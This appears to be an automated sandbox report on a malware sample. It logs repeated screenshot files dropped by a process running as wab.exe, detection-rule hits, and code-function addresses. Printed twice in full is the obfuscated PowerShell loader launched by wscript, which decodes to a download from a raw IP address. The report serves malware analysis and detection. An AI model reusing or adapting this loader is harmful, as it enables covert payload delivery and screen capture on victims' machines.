              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210536.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210636.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210736.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210836.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210937.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211037.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211138.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211238.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192320.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192420.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192520.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192620.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192721.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192821.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192921.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193021.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193121.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193221.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211338.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211438.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211538.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211638.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211738.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211839.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211940.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212040.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212140.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212240.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193321.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193421.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193521.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193621.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193721.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193821.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193921.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194022.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194122.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194222.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212340.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212441.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212541.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212641.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212741.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212843.dat entropy: 7.99895537863Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212943.dat entropy: 7.99909630829Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213043.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213143.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213243.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194322.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194422.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194522.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194622.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194722.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194822.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194922.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195023.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195123.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195223.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213344.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213444.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213544.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213646.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213746.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213846.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213946.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214046.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214146.dat entropy: 7.99894823986Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214247.dat entropy: 7.99894823986Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214349.dat entropy: 7.99894823986Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214449.dat entropy: 7.9990385214Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214549.dat entropy: 7.99897171138Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214649.dat entropy: 7.99897171138Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214749.dat entropy: 7.99897171138Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214850.dat entropy: 7.99897171138Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214950.dat entropy: 7.99897171138Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215052.dat entropy: 7.99897171138Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215155.dat entropy: 7.99904371845Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215256.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215356.dat entropy: 7.99910176685Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195323.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215456.dat entropy: 7.99910176685Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195423.dat entropy: 7.99925034941Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215559.dat entropy: 7.99910176685Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195523.dat entropy: 7.99909630829Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215659.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195623.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215759.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195723.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215900.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195823.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220000.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195923.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220102.dat entropy: 7.9989658831Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200023.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220202.dat entropy: 7.9989658831Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200124.dat entropy: 7.99896090625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220302.dat entropy: 7.9989658831Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200224.dat entropy: 7.99896090625Jump to dropped file

              System Summary

              barindex
              Source: amsi64_6868.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_2912.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6868, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2912, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8097
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 8097
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8097Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 8097Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004016FD NtdllDefWindowProc_A,14_2_004016FD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004017B7 NtdllDefWindowProc_A,14_2_004017B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00402CAC NtdllDefWindowProc_A,15_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00402D66 NtdllDefWindowProc_A,15_2_00402D66
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAACAD61_2_00007FFD9BAACAD6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAADC821_2_00007FFD9BAADC82
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_080110105_2_08011010
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_080118E05_2_080118E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08010CC85_2_08010CC8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044B04013_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043610D13_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044731013_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044A49013_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040755A13_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043C56013_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044B61013_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044D6C013_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004476F013_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044B87013_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044081D13_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041495713_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004079EE13_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00407AEB13_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044AA8013_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00412AA913_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00404B7413_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00404B0313_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044BBD813_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00404BE513_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00404C7613_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00415CFE13_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00416D7213_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00446D3013_2_00446D30
